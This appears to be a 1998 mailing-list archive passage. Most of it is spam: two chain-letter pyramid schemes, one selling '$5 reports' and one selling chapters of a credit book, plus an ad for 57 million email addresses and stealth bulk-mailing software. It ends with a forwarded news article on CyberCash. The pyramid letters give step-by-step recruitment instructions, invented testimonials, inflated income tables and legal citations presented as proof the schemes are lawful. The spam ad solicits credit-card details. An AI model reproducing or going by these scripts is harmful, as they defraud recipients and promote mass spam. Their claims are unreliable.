For each report, send $5.00 CASH, the 
NAME & NUMBER OF THE  REPORT YOU ARE ORDERING, YOUR E-MAIL 
ADDRESS, and YOUR NAME & RETURN ADDRESS (in case of a problem) to the 
person  whose name appears on the list next to the report. 
MAKE SURE YOUR RETURN ADDRESS IS ON YOUR 
ENVELOPE IN CASE OF ANY MAIL PROBLEMS!
When you place your order, make sure you order each of the four reports.  You will 
need all four reports so that you can save them on your computer and resell them.
Within a few days you will receive, via e-mail, each of the four
reports. Save them on your computer so they will be accessible
for you to send to the 1,000's of people who will order them
from you.

2.	IMPORTANT-DO NOT alter the names of the people who are 
listed
next to each report, or their sequence on the list, in any way other
than is instructed below in steps "a" through "f" or you will lose
out on the majority of your profits. 

Once you  understand  the way this works, you'll also see how 
it doesn't work if you change it.
     
Remember, this method has been tested, and if you alter it, it will not work. 
( I talked to a friend last month who has also done this
program.  He said he had tried "playing" with it to change 
the results.  Bad idea.... he never got as much money as 
he did with the UN-altered version.  
Remember, it's a proven method!

a.	Look below for the listing of available reports.
b.	After you've ordered the four reports, take this advertisement 
and remove the name and address under REPORT #4. This person 
has made it through the cycle and is no doubt counting their 
50 grand!

c.	Move the name and address under REPORT #3 down to  REPORT #4.  
d.	Move the name and address under REPORT #2 down to REPORT #3.
e.	Move the name and address under REPORT #1 down to REPORT #2.
f.	Insert your name/address in the REPORT #1 position.


Please make sure you copy every name and address ACCURATELY!
3.	Take this entire letter, including the modified list of names, 
and save it to your computer.  Make NO changes to the instruction
portion of this letter.
  
4.	Now you're ready to start an advertising campaign on the
INTERNET!  Advertising on the 'Net is very, very inexpensive,
and there are 
HUNDREDS of FREE places to advertise. 
Another avenue which you could use for advertising is e-mail 
lists. You can buy these lists for under $20/2,000 addresses 
or you can pay someone a minimal charge to take care of it 
for you. 
     
BE SURE TO START YOUR AD CAMPAIGN 
IMMEDIATELY!
5.	For every $5.00 you receive, all you must do is e-mail them 
the
report they ordered.  THAT'S IT!
ALWAYS PROVIDE SAME-DAY SERVICE ON ALL 
ORDERS!
This will guarantee that the e-mail THEY send out, with YOUR 
name and address on it, will be prompt because they can't 
advertise until they receive the report!

------------------------------------------

AVAILABLE REPORTS:

------------------------------------------

*** Order Each REPORT by NUMBER and NAME ***
Notes:

-  
ALWAYS SEND $5 CASH (U.S. CURRENCY) FOR EACH 
REPORT CHECKS NOT ACCEPTED
ALWAYS SEND YOUR ORDER VIA FIRST CLASS  MAIL 
Make sure the cash is concealed by wrapping it in at least two
sheets of paper  
On one of those sheets of paper, include: (a) the number & name
of the report you are ordering, (b) your e-mail address, and
(c) your name & postal address.

PLACE YOUR ORDER FOR THESE REPORTS NOW:
_______________________________________________________________

REPORT #1 "HOW TO MAKE $250,000 THROUGH 
MULTI-LEVEL SALES"
ORDER REPORT #1 FROM: 
MS
3919 BETHEL BLVD.
HOUSTON, TEXAS 77092 
			
			
			
                      
_________________________________________________________

REPORT #2 "MAJOR CORPORATIONS AND MULTI-
LEVEL SALES"
ORDER REPORT #2 FROM:
JD
311 SOUTH STATE RD. 301
BLUFFTON, INDIANA 46714

		        
                       
            

_____________________________________________________________________

REPORT #3 "SOURCES FOR THE BEST MAILING 
LISTS"
ORDER REPORT #3 FROM:
GS
3939 S. HARRISON STREET
FORT WAYNE, INDIANA 46807-2417
			 
			
_____________________________________________________________________
>
REPORT #4 "EVALUATING MULTI-LEVEL SALES 
PLANS"
ORDER REPORT #4 FROM:
SAM
P.O. BOX 13492
CHESAPEAKE,VA 23325-0492
                                                
                        
                 


_____________________________________________________________


HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU              $MONEY$:

Let's say you decide to start small just to see how 
well it works. Assume your goal is to get 10 people 
to participate on you're first level. (Placing a lot of 
FREE ads on the Internet will EASILY get a larger response.) 
Also assume that everyone else in YOUR ORGANIZATION gets 
ONLY 10 downline members.  Follow this example to achieve 
the STAGGERING results below.

1st level-your 10 members with 
$5............................................$50
2nd level--10 members from those 10 ($5 x 100).....................$500
3rd level--10 members from those 100 ($5 x 1,000)............$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
THIS TOTALS: $55,550   

Remember friends, this assumes that the people who 
participate only recruits 10 people each.  Think for 
a moment what would happen if they got 20 people to 
participate! Most people get 100's of participants! 
THINK ABOUT IT!
Your cost to participate in this is practically 
nothing (surely you can afford $20). You obviously 
already have an Internet connection and e-mail is 
FREE! 


REPORT#3 shows you the most productive methods for bulk 
e-mailing and purchasing e-mail lists.  Some list & bulk 
e-mail vendors even work on trade!

About 50,000 new people get online every month!
******* TIPS FOR SUCCESS*******
TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and
follow the directions accurately.
Send for the four reports IMMEDIATELY so you will have them
when the orders start coming in because:
     
When you receive a $5 order, you MUST send out the requested
product/report to comply with the U.S. Postal & Lottery Laws, 
Title 18,Sections 1302 and 1341 or Title 18,  Section 3005 in 
the U.S. Code, also Code of Federal Regs. vol. 16, Sections 
255 and 436, which state that "a product or service must be 
exchanged for money received."

ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.
Be patient and persistent with this program. If you follow the 
instructions exactly, your results WILL be SUCCESSFUL!
ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL
SUCCEED!
******* YOUR SUCCESS GUIDELINES*******
Follow these guidelines to guarantee your success:
If you don't receive 10 to 20 orders for REPORT #1 within 
two weeks, continue advertising until you do.  Then, a couple 
of weeks later you should receive at least 100 orders for 
REPORT #2.  If you don't, continue advertising until you do.


Once you have received 100 or more orders for REPORT #2, 
YOU CAN RELAX, because the system is already working for 
you, and the cash will continue to roll in!


THIS IS IMPORTANT TO REMEMBER:
Every time your name is moved down on the list, you are 
placed in front of a DIFFERENT report.  You can KEEP 
TRACK of your PROGRESS by watching which report people 
are ordering from you.  If you want to generate more income, 
send another batch of e-mails and start the whole process 
again!  There is no limit to the income you will generate 
from this business!


******* T  E  S  T  I  M  O  N  I  A  L  S *******
This program DOES work, but you must follow it EXACTLY!  
Especially the rule of not trying to place your name in a different 
position, it won't work and you'll lose a lot of potential income.  
I'm living proof that it works.  It really is a great opportunity to 
make relatively easy money, with little cost to you.  If you do 
choose to participate, follow the program exactly, and you'll be 
on your way to financial security. 
Sean McLaughlin, Jackson, MS
My name is Frank. My wife, Doris, and I live in Bel-Air, MD. 
I am a cost accountant with a major U.S. Corporation and I 
make pretty good money. When I received the program I 
grumbled to Doris about receiving "junk mail." I made fun of 
the whole thing, spouting my knowledge of the population 
and percentages involved.  I "knew" it wouldn't work. Doris 
totally ignored my supposed intelligence and jumped in with 
both feet. I made merciless fun of her, and was ready to lay 
the old "I told you so" on her when the thing didn't work... 
well, the laugh was on me!  Within two weeks she had 
received over 50 responses. Within 45 days she had received 
over $147,200 in $5 bills! I was shocked!  I was sure that I had 
it all figured and that it wouldn't work.  I AM a believer now. I 
have joined Doris in her "hobby."   I did have seven more years 
until retirement, but I think of the "rat race" and it's not for me. 
We owe it all to MLM.
Frank T., Bel-Air, MD
I just want to pass along my best wishes and encouragement to 
you.  Any doubts you have will vanish when your first orders 
come in. I even checked with the U.S. Post Office to verify that the 
plan was legal. It definitely is! IT WORKS!!!
Paul Johnson, Raleigh, NC
The main reason for this letter is to convince you that this system 
is honest, lawful, extremely profitable, and is a way to get a large 
amount of money in a short time. I was approached several times 
before I checked this out. I joined just to see what one could expect 
in return for the minimal effort and money required.  To my astonishment, 
I received $36,470.00 in the first 14 weeks, with money still coming in.
Sincerely yours, Phillip A. Brown, Esq.
Not being the gambling type, it took me several weeks to make up 
my mind to participate in this plan. But conservative that I am, 
I decided that the initial investment was so little that there was just 
no way that I wouldn't get enough orders to at least get my money 
back. Boy, was I surprised when I found my medium-size post office 
box crammed with orders!  For awhile, it got so overloaded that I had 
to start picking up my mail at the window. I'll make more money this 
year than any 10 years of my life before. The nice thing about this 
deal is that it doesn't matter where in the U.S. the people live. There 
simply isn't a better investment with a faster return.
Mary Rockland, Lansing, MI
I had received this program before. I deleted it, but later I wondered 
if I shouldn't have given it a try. Of course, I had no idea who to contact 
to get another copy, so I had to wait until I was e-mailed another program...
11 months passed then it came...I didn't delete this one!...I made more 
than $41,000 on the first try!!
D. Wilburn, Muncie, IN
This is my third time to participate in this plan. We have quit our 
jobs, and will soon buy a home on the beach and live off the interest on our 
money.  The only way on earth that this plan will work for you is if you 
do it. For your sake, and for your family's sake don't pass up this golden 
opportunity.  Good luck and happy spending!
Charles Fairchild, Spokane, WA

ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO 
FINANCIAL FREEDOM!
NOW IS THE TIME FOR YOUR TURN!

DECISIVE ACTION YIELDS POWERFUL RESULTS !!
DO IT TODAY AND YOU WILL SEE!!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awzoie@ixleic.com
Date: Sun, 5 Jul 1998 19:46:13 -0700 (PDT)
To: @@althea.ucs.uwplatt.edu
Subject: YOUR INDEPENDENCE DAY ARRIVES IN 90 DAYS!!
Message-ID: <199807060241.AA20526@althea.ucs.uwplatt.edu>
MIME-Version: 1.0
Content-Type: text/plain




Are you interested in making a substantial part-time income working from the comfort of your home on your computer, never having to speak to anyone?  What if I told you this business only required one hour or less of your time each day?  And if you knew that you could secure your financial independence in the next 3-6 months, would you be interested?  I THOUGHT SO!  Listen to this...

If you have seen the chain letters that abound on the internet, you might think this is just another one of them.  Well, surprise!  It is NOTHING like them!  This program incorporates powerful marketing concepts that will make you HUGE amounts of money using an information product that is actually useful, unlike useless "reports" that are promoted in chain letter scams.  If making up to $100,000 or more in the next 6 months interests you, read on...  


"I'm Buying The Home of Our Dreams With CASH From The Proceeds I Received After Reading This Email!"

Hello!

My name is Marilyn Potter; I'm a 32 year-old wife, mother of two and a part-time medical transcriptionist.  Normally I delete all "junk" email immediately when I receive it and use my email account primarily for my business that I do at home.  I received a similar email numerous times over the past 2 years and deleted it every time.

I again received this email four months ago and since it had a catchy title I finally read it.  The concept was so compelling that I finally said, "OK, I give in. I'll give this a try.  Investing $40 is something I can afford and the chance to make some serious money would certainly not hurt either!"  I mailed four $10 bills right away and after receiving all four chapters of the informative "CREDIT SECRETS REVEALED" book, I paid a friend of mine a small sum of money to email my ad to 20,000 people.  The person who sent me the first chapter of the book also sent me a message that showed me how to market this valuable information with my computer for free.

I was hardly prepared for the results!  For the past 90 days I have received more money than I have made in the past 5 years combined.  The cash continues to roll in and at times I have to pick up my mail from the window at the post office because it won't fit in the medium-sized post office box I rented!  And the cash just continues to flood my mailbox!

My husband Jeff and I have been saving every penny over the past 7 years to purchase a new home for our family with a large downpayment.  Well, we now have enough money to purchase the home of our dreams with CASH!  We are also going to spend a MONTH in Hawaii to celebrate!  I owe it all to this incredible program that I finally decided to try after deleting it so many times.  

I promise you, if you follow the directions in this e-mail and be prepared to eventually set aside about an hour each day to follow up (and count your money!), you will make at least as much money as we did.  You don't need to be a whiz at the computer, but I'll bet you already are. If you can open an envelope, remove the money, and send an e-mail message, then you're on your way to the bank.  Take the time to read this so you'll understand how easy it is.  If I can do this, so can you!

Don't Delay, Start Living Your Dreams TODAY!!

Marilyn Potter 
 
The following is a copy of the e-mail I read:


********************************************************
THIS IS THE VERY LATEST AND MOST PROFITABLE MONEY-MAKING PHENOMENON YOU WILL EVER SEE.

Do NOT mistaken this for the many chain letter SCAMS that you may have seen lately.  This program offers VERY VALUABLE information in addition to the chance to make more money than you have ever seen before!

Read this email carefully and then print it out for reference.  Follow the simple directions and get started TODAY!

With this new program, your financial dreams can come true.  Are you sick of living paycheck to paycheck?  Would you like to be able to go on vacation wherever and whenever you like?  Does getting up on Monday morning without the stress of running off to work to a job that you dislike make you want to hear more about this business?  Your dreams CAN come true but you MUST take action in order for your life to change.  This COMPLETELY LEGITIMATE, LOW COST business can put you in the driver's seat financially for life.  Don't waste another minute living your life for other people.  Start TODAY living it for you and your family.

What's even better, this business NEVER requires you to talk to or come in contact with anyone and allows you to work from the privacy of your own home.  No more deadlines to meet!  No more worrying if your boss will still like you and keep you on his payroll for another month.  All you need to do is to go to the post office and pick up your money every day and then take it to the bank!  THAT'S IT!!  No hard work and you can feel good because you are providing VALUABLE information that EVERYONE NEEDS!!

This business is automatic and keeps money rolling in even if you are not working at it.  What could be better?  It is so simple to start and doesn't require you to train anyone.  This initial email does all of that for you!  When followed correctly, this electronic, multilevel marketing program works perfectly... 100% OF THE TIME!

Thousands of people have used this program to:

Buy houses for CASH
Pay off DEBT 
Put large downpayments on new homes 
Finance existing businesses 
Pay for education 
Raise capital to start new businesses 
Pay cash for new cars 
MUCH, MUCH MORE!!

You must be interested by now, or you wouldn't have read this far!  Now is your chance to discover financial freedom like you have never had before!  Keep on reading, you will not be sorry.

OVERVIEW OF THIS AMAZING PROGRAM:

Here is how it works:

We sell the book "CREDIT SECRETS REVEALED" via email to thousands of customers for a one-time total cost of $40.  Here is what makes this so exciting!  The book is divided into 4 chapters which are sold individually.  By purchasing the book and adding your name to the list, your name will move from the top to the bottom automatically and as it does the MONEY you make will increase exponentially.

As with all multilevel businesses, we build our business by recruiting new partners and selling our product.  Every state in the U.S. allows you to recruit new multilevel business online (via your computer).

Here is the difference between this exciting program and "chain letter" scams.  We market a book that contains VERY USEFUL information that EVERYBODY needs, not some useless report.  When you order this book (which retails for $72.95), you will find how:

* To find the LOWEST credit card rates 
* To manage your finances using credit cards to your advantage. 
* To obtain MULTIPLE credit cards 
* To consolidate your debt 
* To obtain credit if you are financially challenged 
* To get rich using other people's money 
* To avoid the pitfalls of credit card usage 
* To contact banks offering the best loan deals today 
* To obtain business loans 
* To find credit card companies offering matching airline miles 
* To be successful when applying for credit and how to get the highest possible limit.

Each order you receive via "snail mail" will include:

1) $10.00 CASH  2) The name and number of the chapter they are ordering  3) The e-mail address where you will e-mail them the chapter they ordered.

To fill each order, you simply e-mail the product to the buyer.  THAT'S IT! The $10.00 is yours! This is the EASIEST electronic multilevel marketing business anywhere!

READ THE FOLLOWING CAREFULLY AND THEN REAP THE HUGE REWARDS!


******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 chapters shown on the list below (you can't
   sell the book if you don't order all 4 chapters).
     
     *  For each chapter, send $10.00 CASH, the NAME & NUMBER OF THE CHAPTER YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR NAME & RETURN ADDRESS (in case of a problem) to the person whose name appears on the list next to the chapter. MAKE SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE IN CASE OF ANY MAIL PROBLEMS!
  
     *  When you place your order, make sure you order each of the four chapters.  You will need all four so that you will have the entire book to sell.

     *  Within a few days you will receive, via e-mail, each of the four chapters. Save them on your computer so they will be accessible for you to send to the 1,000's of people who will order them from you.  MAKE SURE TO PRINT THEM AS WELL IN CASE OF PROBLEMS!

2.  IMPORTANT-- DO NOT alter the names of the people who
	 are listed next to each chapter, or their sequence on
	 the list, in any way other than is instructed below in
	 steps "a" through "f" or you WILL LOSE OUT on the
	 majority of your profits!  Once you understand the way
	 this works, you'll also see how it doesn't work if you
	 change it. Remember, this method has been tested, and
	 if you alter it, it will NOT work.

    a.  Look below for the listing of chapters.

    b.  After you've ordered the four chapters, take this advertisement and remove the name and address under chapter #4. This person has made it through the cycle and is no doubt counting their $100,000!

    c.  Move the name and address under CHAPTER #3 down to CHAPTER #4.

    d.  Move the name and address under CHAPTER #2 down to CHAPTER #3.

    e.  Move the name and address under CHAPTER #1 down to CHAPTER #2.

    f.  Insert your name/address in the CHAPTER #1 position.

Please make sure you copy every name and address ACCURATELY!

3.  Take this entire letter, including the modified list of names, and save it on your computer.  Make NO changes to the instruction portion of this letter.  PRINT OUT THE LETTER AS WELL!
  
4.  Now you're ready to start an advertising campaign on the INTERNET!  Advertising on the 'Net is very, very inexpensive, and there are HUNDREDS of FREE places to advertise.  The marketing email you will receive with chapter 1 will explain internet advertising in greater detail.  BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5.  For every $10.00 you receive, all you must do is e-mail them the chapter they ordered. THAT'S IT! ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS! This will guarantee that the e-mail THEY send out, with YOUR name and address on it, will be prompt because they can't advertise until they receive the chapter!

CHAPTERS TO PURCHASE

*** Order Each CHAPTER by NUMBER and NAME ***

Notes:

-  ALWAYS SEND $10 CASH (U.S. CURRENCY) FOR EACH CHAPTER. CHECKS NOT ACCEPTED -  ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL -  Make sure the cash is concealed by wrapping it in at least two sheets of paper -  On one of those sheets of paper, include: (a) the number & name of the chapter you are ordering, (b) your e-mail address, and (c) your name & postal address.

PLACE YOUR ORDER FOR THESE CHAPTERS NOW:
_________________________________________________


CHAPTER #1  "SECRETS FOR THOSE WITH CREDIT CHALLENGES"
     
     ORDER CHAPTER #1 FROM:
	 
	 L&S Enterprises 
	 P.O. Box 11665 
	 Eugene, OR 97440

CHAPTER #2  "THE LOWEST RATES IN CREDIT CARDS TODAY"

     ORDER CHAPTER #2 FROM:

	 Unlimited Enterprises 
	 PO Box 1516 
	 Eugene, OR 97440
		
CHAPTER #3  "DEBT MANAGEMENT TO YOUR ADVANTAGE"

     ORDER CHAPTER #3 FROM:
	 
	 Bergman & Associates
	 PO Box 1083
     Oakridge, OR  97463

CHAPTER #4 "OBTAINING LOANS FOR YOUR BUSINESS"

     ORDER CHAPTER #4 FROM:
 
	 Dream Merchants
	 P.O. Box 1850 
	 Bonner's Ferry, ID 83805

 
_________________________________________________

***IMPORTANT!!***  YOU WILL RECEIVE A MARKETING LETTER WITH CHAPTER ONE.  YOU WILL NEED TO SEND THIS TO ANYONE WHO ORDERS CHAPTER ONE FROM YOU.  THIS WILL EXPLAIN HOW TO MARKET THIS BOOK EFFECTIVELY.

You might wonder how this program can make you so much money.  Well, keep reading and you will see how powerful this AUTOMATIC online business actually is!

Let's say you decide to start small just to see how well it works. Assume your goal is to get 10 people to participate on your first level. (Placing a lot of FREE ads on the internet will EASILY get a larger response.) Also assume that everyone else in YOUR ORGANIZATION gets ONLY 10 downline members.  Follow this example to achieve the STAGGERING results below.

1st level--your 10 members with $10.................$100 
2nd level--10 members from those 10 ($10 x100).....$1000 
3rd level--10 members from those 100 ($10 x 1,000).$10,000
4th level--10 members from those 1,000 ($10x10,000).$100,000
TOTALS        ----------->$111,100!

Remember, this assumes that the people who participate only recruit 10 people each. Think for a moment what would happen if they got 20 people to participate! Most people get 100's of participants! THINK ABOUT IT!

Your cost to participate in this is relatively very little (surely you can afford $40). You obviously already have an Internet connection and e-mail is FREE!


About 50,000 new people get online every month!

******* TIPS FOR SUCCESS *******

 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and follow the directions accurately.

 *  Send for the four chapters IMMEDIATELY so you will have them when the orders start coming in because:

        When you receive a $10 order, you MUST send out the requested product to comply with the U.S. Postal & Lottery Laws, Title 18,Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S. Code, also Code of Federal Regs. vol. 16, Sections 255 and 436, which state that "a product or service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

 *  Be PATIENT and PERSISTENT with this program. If you follow the instructions exactly, your results WILL be SUCCESSFUL!

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!


******* YOUR SUCCESS GUIDELINES *******

Follow these guidelines to guarantee your success:

If you don't receive 10 to 20 orders for chapter #1 within two weeks, continue advertising until you do. Then, a couple of weeks later you should receive at least 100 orders for chapter #2.  If you don't, continue advertising until you do.

Once you have received 100 or more orders for chapter #2, YOU CAN RELAX, because the system is already working for you, and the cash will continue to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front of a DIFFERENT chapter. You can KEEP TRACK of your PROGRESS by watching which chapter people are ordering from you.  If you want to generate more income, send another batch of e-mails and start the whole process again!  There is no limit to the income you will generate from this business!


******* T  E  S  T  I  M  O  N  I  A  L  S *******


My name is Scott Hampton and I live in Portland, Oregon.  I am an airline pilot and make very good money doing what I do.  Unfortunately I have built up a HUGE debt load from poor business transactions over the past 5 years.  I am now living paycheck to paycheck even though I make over $60,000 per year as a pilot.  I received this email approximately 6 months ago and decided to try it.  I promptly ordered the useful book "CREDIT SECRETS REVEALED" and began marketing it aggressively.  I was surprised when I found my post office box filled with over 300 orders in less than 30 days.  Over the course of the next 3 months I have personally made $113,540!  I have been able to pay off my debts quickly and have taken a much needed vacation.  The money continues to roll in and I am preparing to do another mailing in about 30 days.  All I can say is that I was skeptical but now I am a believer!

Scott Hampton, Portland, Oregon



I received this email about 1 year ago and immediately tossed it out stating to my wife that I was going to track down the person who sent it to me and give them a piece of my mind.  I forgot about it and about 7 months later received it again.  However this time I was in very high debt because my son was just accepted to a prestigious school and the tuition was astronomical.  I viewed this opportunity differently and decided to try it.  I figured I could certainly afford the $40 and had little to lose.  Well, I am pleased to say that my son now has a "free" education as a result of this incredible program.  I have never seen anything like it in my life.  Routinely my PO box has 50-100 letters in it at a time.  You MUST try it to believe it.  It is like opening a present every day!

Walter Hickman  Denver, Colorado



My wife and I have been married for 3 years now and we just had our second child Heather.  We have been living in a 700 square foot apartment with very basic living necessities.  We are both working and making ends meet is nearly impossible.  My school bills were nearly $30,000 and the monthly payment was making it hard to find money to buy food.  In addition to that, I was spending my 12 hour workdays away from my family, putting a strain on them.  Late one evening about 10 months ago I received this email.  I felt things could not get much worse and decided to at least give it a try.  I mailed for the book and began marketing as the instructions indicated.  Well, the rest is history.  We are now purchasing a new home with 30% down and I am happy to say that my school bill will be paid off in 3 months.  I owe it all to this incredible online MLM program!

Jeremy Bass, Providence, Rhode Island



Believe me, your efforts will certainly be rewarded with this easy, automatic money making wonder!  I started about 2 months ago and now have enough money to purchase a new Mercedes convertible.  I never thought I'd ever have enough money to purchase the car of my dreams but now I do.  This program has made me believe in MLM again!

Larry Lancaster, Dallas, Texas



All my life I have wanted to retire early.  Well, here I was, nearly 65 years old with not a cent in my savings account.  I had never been able to save money because of high medical bills that I have had since my bypass surgery.  I am in debt over $74,000 and must keep working the rest of my life.  My stressful corporate life lead to my heart problems and now I am stuck with paying my health bills.  Needless to say, I jumped at the chance when I read this email.  I mailed out the 4 $10 bills right away and started advertising when I received the complete book.  I guess all I can say is that I never dreamed I'd be in a position like I am now.  I have paid off my medical bills and have put over $30,000 into savings.  I plan to advertise this program about every 4 months and build up my savings account to over $500,000 so I can retire in about 3 years or less.  Believe me, without this amazing MLM program I'd never be in such an enviable position!

Frank Statton,  Los Angeles, California

My name is Mary and I have lived alone since my husband Allen passed away 3 years ago.  I have 4 young children and was constantly depending on Welfare and our church family to help get us through our financial crisis.  There was always more month at the end of the money and it seems like there was absolutely no way out of this disaster.  Even though all our friends have been wonderful to us I finally decided to do something about it.  I received this email on the computer I share with my friend.  She looked at it and told me it would never work.  I decided to at least see how it would work if I tried it.  That was about 5 months ago and my life will never be the same again.  After one month I was able to purchase a much needed Dodge Caravan for getting the kids around in.  I figured that was the end of the money but then the money volume went up by around 4 times!  I could not believe it!  We now are totally self sufficient and are purchasing a moderate sized home so we can!
 stretch out some.  The product it
self was very helpful and showed me how to improve my financial well-being considerably.  You have to try it to see that it works!  Go for it today!

Mary Romero,  Washington, DC


ORDER THE BOOK "CREDIT SECRETS REVEALED" TODAY AND GET STARTED ON YOUR ROAD TO FINANCIAL FREEDOM!

WITHOUT ACTION YOUR FUTURE CANNOT CHANGE!  TAKE CONTROL OF YOUR FINANCIAL FUTURE NOW!!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sun, 5 Jul 1998 18:08:51 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Daily News Sun Jul 5 '98
Message-ID: <19980706000211.443.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

New: STUFFED - the News & Babes Daily!

<img src=http://stuffed.net/98/7/5/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/5/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fojiizoi93@prodigy.com
Date: Mon, 6 Jul 1998 02:39:16 -0700 (PDT)
To: fojiizoi93@prodigy.com
Subject: Email 57 Million People for $99
Message-ID: <199807061031HAA6919@pimiaia5y.accuweb.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain


          57 MILLION
EMAIL ADDRESSES
FOR ONLY $99 


       
  You want to make some money? 


I can put you in touch with over 50 million people at virtually no cost.


Can you make one cent from each of theses names?


If you can you have a profit of over $500,000.00 



      That's right, I have 57 Million  Fresh  email 


addresses that I will sell for only $99. These are all 


fresh addresses that include almost every person 


on the Internet today,  with no duplications. They are 


all sorted and ready to be mailed.  That is the best 


deal anywhere today !  Imagine selling a product for 


only $5 and getting  only a 1/10% response.   That's  


$2,850,000  in your pocket !!! 
Don't believe it? People are making that kind of 


money right now by doing the same thing, that is 


why you get so much email from people selling you 


their product....it works !  I will even tell you how to 


mail them with easy to follow step-by-step 


instructions I include with every order.  These 57 


Million email addresses are yours to keep, so you 


can use them over and over and they come on 1 CD.  


This offer is not for everyone.


If you can not see the just how excellent the


risk / reward ratio in this offer is then there is 


nothing I can do for you. 


To make money you must stop dreaming 


and TAKE ACTION.



****************************************


THE BRONZE MARKETING SETUP


57,000,000 email addresses on CD


These name are all in text files


ready to mail!!!


$99.00


****************************************


THE SILVER MARKETING SETUP


57,000,000 email addresses on CD


These name are all in text files


ready to mail!!!       AND


8 Different Bulk email programs 


and tools  to help with your mailings


and list management.


$ 139.00


****************************************


THE GOLD MARKETING SETUP


VIRTUALLY EVERYTHING!!


57,000,000 email addresses on CD


These name are all in text files


ready to mail!!!       AND


8 Different Bulk email programs 


and tools  to help with your mailings


and list management.


             AND 


Over 500 different Business Reports


now being sold on the Internet for up to


$100 each. You get full rights to resell these reports.


With this package you get the email addresses, 


the software to mail them AND ready to sell  


information products.


AND ...... 


.. a collection of the 100 best money making


adds currently floating around on the Internet.


$ 189


****************************************


THE PLATINUM MARKETING SETUP


FOR THOSE READY TO "OWN THE NET"


57,000,000 email addresses on CD


These name are all in text files


ready to mail!!!       AND


8 Different Bulk email programs 


and tools  to help with your mailings


and list management.


             AND 


Over 500 different Business Reports


now being sold on the Internet for up to


$100 each. You get full rights to resell these reports.


With this package you get the email addresses, 


the software to mail them AND ready to sell  


information products.


AND ...... 


.. a collection of the 100 best money making


adds currently floating around on the Internet.


AND ......


FLOODGATE & GOLDRUSH FULLY REGISTERED SOFTWARE!!


This is the Number 1 most powerful mass mailing software in the world today.
There is nothing that can compare for speed, reliability, performance, and the
ability to use "stealth" functions.


This is the package that will allow you to use the net as your own personal
"money tree" at will!!!


$ 379


****************************************
SEVERAL WAYS TO ORDER !!!


IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 57 MILLION + NAMES
WITHIN 12 HOURS OF YOUR ORDER!!!


  1) WE ACCEPT:  AMERICAN EXPRESS OR
    
                               VISA <> MASTERCARD
     TYPE OF CARD  AMX / VISA / MC??_______________


      EXPIRATION DATE   ___________________________
     NAME ON CREDIT CARD________________________
     CREDIT CARD #________________________________
     BILLING ADDRESS ____________________________
     CITY_________________________________________
    STATE________________ZIP_____________________
   PHONE INCLUDE AREA CODE___________________
   
    EMAIL ADDRESS______________________________ 


        WE WILL BILL selected amount to your account plus the following
shipping costs


        SHIPPING  COST OF 3.85 FIRST CLASS MAIL


        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL /  FEDERAL EXPRESS
        SALES TAX  added to AR residents 
  >>> Send correct amount in cash, check or money


order to:


  >>> FIRE POWER!!
  >>> 1320 N. "B" St., Suite 112-24
  >>> Fort Smith, AR  72901



   2) Send the same above requested credit card 


information to above address. 
   


   3) Call phone # 530-876-4293.  This is a 24 hour phone 


number to place a CREDIT CARD order.



FIRE POWER! is a private company and is not affiliated with, or endorsed by,
AOL, MSN, or any other Internet Service Provider.


Copyright 1998


All rights reserv




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 6 Jul 1998 06:39:56 -0700 (PDT)
To: Digital Bearer Settlement List <cypherpunks@toad.com
Subject: IP: "CyberCash can't oust credit cards"
Message-ID: <v0401170bb1c67c2a2ef8@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Hettinga's three laws of internet payment technology investment:

1. Geodesic, peer-to-peer transactions.
2. Three orders of magnitude cost reduction.
3. Nothing but net.

The application of the above to Cybercash, or SET, for that matter, I leave
as an exercise for the reader...

Cheers,
Bob Hettinga


--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sun, 05 Jul 1998 13:53:40 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: "CyberCash can't oust credit cards"
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Charlotte (N.C.) Observer (printing a Washington Post article)

Posted at 3:32 p.m. EDT Friday, July 3, 1998

 CyberCash can't oust credit cards

By MARK LEIBOVICH
The Washington Post

 WASHINGTON -- Two years ago, CyberCash
 Inc. walked tall as a pioneer in the seemingly vast
 frontier of Internet commerce. Today, the Reston,
 Va., firm and its software that lets merchants
 receive payments over the Internet offers a
 cautionary lesson in how social habits in the digital
 age are difficult to predict -- and dicey to stake a
 business on.

 On Tuesday, CyberCash announced that its
 second-quarter revenue would be below
 expectations, and that it would lay off 20 percent
 of its staff. The news sent its stock price into a
